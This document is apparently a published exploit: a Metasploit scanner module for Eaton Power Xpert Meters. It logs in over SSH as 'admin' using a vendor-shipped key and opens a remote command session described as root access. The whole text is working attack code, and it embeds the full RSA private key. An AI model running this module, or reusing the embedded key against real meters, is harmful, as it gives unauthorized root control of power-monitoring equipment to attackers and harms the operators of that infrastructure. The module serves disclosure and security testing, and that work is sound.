# Exploit Title: Eaton Xpert Meter - SSH Private Key Disclosure # Date: 2018-07-16 # WebPage: https://CTRLu.net/ # Vendor Homepage: http://www.eaton.com/ # Vendor Advisory: http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf # Software Link: http://www.eaton.com/Eaton/ProductsServices/Electrical/ProductsandServices/PowerQualityandMonitoring/PowerandEnergyMeters/PowerXpertMeter400060008000/index.htm#tabs-2 # Version: Firmware <= 12.x and <= 13.3.x.x and below more versions may be impacted # Recomended to update to Version or above # Tested on: Firmware and # CVE : N/A # XXX: This shouldn't be necessary but is now require 'net/ssh/command_stream' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Auxiliary::Scanner include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Eaton Xpert Meter SSH Private Key Exposure Scanner', 'Description' => %q{ Eaton Power Xpert Meters are used across industries for energy management, monitoring circuit loading, and identifying power quality problems. Meters running firmware 12.x.x.x or below version 13.3.x.x and below ship with a public/private key pair on Power Xpert Meter hardware that allows passwordless authentication to any other affected Power Xpert Meter. The vendor recommends updating to Version or above. As the key is easily retrievable, an attacker can use it to gain unauthorized remote access as uid0 }, 'Author' => [ 'BrianWGray' ], 'References' => [ ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'], ['URL', 'https://www.ctrlu.net/vuln/0006.html'] ], 'DisclosureDate' => 'Jul 18 2018', 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(22) ]) register_advanced_options([ OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) ]) end def run_host(ip) factory = ssh_socket_factory ssh_opts = { auth_methods: ['publickey'], port: rport, key_data: [ key_data ], hmac: ['hmac-sha1'], encryption: ['aes128-cbc'], kex: ['diffie-hellman-group1-sha1'], host_key: ['ssh-rsa'], use_agent: false, config: false, proxy: factory } ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, 'admin', ssh_opts) end rescue Net::SSH::Exception => e vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") return end return unless ssh print_good("#{ip}:#{rport} - Logged in as admin") version = ssh.transport.server_version.version report_vuln( host: ip, name: self.name, refs: self.references, info: version ) shell = Net::SSH::CommandStream.new(ssh) return unless shell info = "Eaton Xpert Meter SSH Backdoor (#{version})" ds_merge = { 'USERNAME' => 'admin' } start_session(self, info, ds_merge, false, shell.lsock) # XXX: Ruby segfaults if we don't remove the SSH socket remove_socket(ssh.transport.socket) end def rport datastore['RPORT'] end def key_data <<EOF -----BEGIN RSA PRIVATE KEY----- MIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4Mj C15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDgl TyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKB gQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/ c2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQP I3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2W gA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3 YzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaB trQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZd O0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJf z54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+z zyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh 7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA== -----END RSA PRIVATE KEY----- EOF end end